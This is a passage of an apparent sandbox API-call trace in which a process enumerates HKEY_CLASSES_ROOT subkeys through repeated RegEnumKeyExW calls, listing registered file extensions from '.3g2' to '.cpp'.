lpftLastWriteTime=0x0) returned 0x0 [0103.577] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x2, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".3g2", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.577] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x3, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".3gp", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.577] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x4, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".3gp2", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.577] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x5, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".3gpp", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.577] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x6, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".3mf", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.578] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x7, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".a", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.578] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x8, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".aac", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.578] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x9, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".ac3", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.578] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xa, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".accda", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.578] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xb, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".accdb", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.578] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xc, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".accdc", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.578] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xd, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".accde", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.578] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xe, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".accdr", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.578] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0xf, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".accdt", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.578] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x10, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".accdu", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.578] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x11, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".accdw", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.578] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x12, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".accft", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.578] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x13, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".accountpicture-ms", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.578] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x14, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".acl", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.578] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x15, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".acrobatsecuritysettings", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.578] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x16, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".ade", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.578] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x17, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".adn", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.578] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x18, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".adp", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.578] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x19, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".adt", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.578] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1a, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".adts", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.579] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1b, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".ai", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.579] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1c, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".aif", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.579] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1d, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".aifc", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.579] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1e, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".aiff", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.579] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1f, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".amr", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.579] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x20, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".ani", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.579] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x21, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".ans", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.579] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x22, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".api", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.579] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x23, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".appcontent-ms", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.579] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x24, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".application", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.579] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x25, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".appref-ms", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.579] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x26, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".appx", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.579] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x27, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".appxbundle", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.579] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x28, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".aps", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.579] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x29, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".arc", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.579] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x2a, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".arj", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.579] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x2b, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".art", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.579] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x2c, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".arw", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.579] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x2d, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".asa", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.580] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x2e, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".asc", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.580] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x2f, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".ascx", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.580] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x30, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".asf", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.580] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x31, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".asm", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.580] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x32, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".asmx", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.580] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x33, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".asp", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.580] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x34, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".aspx", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.580] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x35, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".asx", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.580] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x36, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".au", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.580] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x37, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".avi", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.580] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x38, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".aw", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.580] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x39, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".bas", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.580] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x3a, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".bat", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.580] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x3b, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".bcp", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.580] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x3c, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".bin", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.580] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x3d, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".bkf", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.580] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x3e, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".blg", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.580] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x3f, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".bmp", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.581] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x40, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".bsc", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.581] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x41, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".c", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.581] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x42, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".c5e2524a-ea46-4f67-841f-6a9465d9d515", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.581] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x43, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".cab", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.581] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x44, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".camp", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.581] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x45, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".cat", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.581] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x46, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".cc", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.581] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x47, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".cda", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.581] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x48, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".cdmp", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.581] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x49, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".cdx", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.581] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x4a, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".cdxml", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.581] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x4b, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".cer", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.581] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x4c, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".cgm", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.581] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x4d, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".chk", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.581] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x4e, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".chm", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.581] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x4f, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".cls", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.581] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x50, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".cmd", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.581] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x51, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".cod", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.581] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x52, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".com", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.581] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x53, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".compositefont", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.582] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x54, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".contact", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.582] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x55, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".cpl", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.582] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x56, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".cpp", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 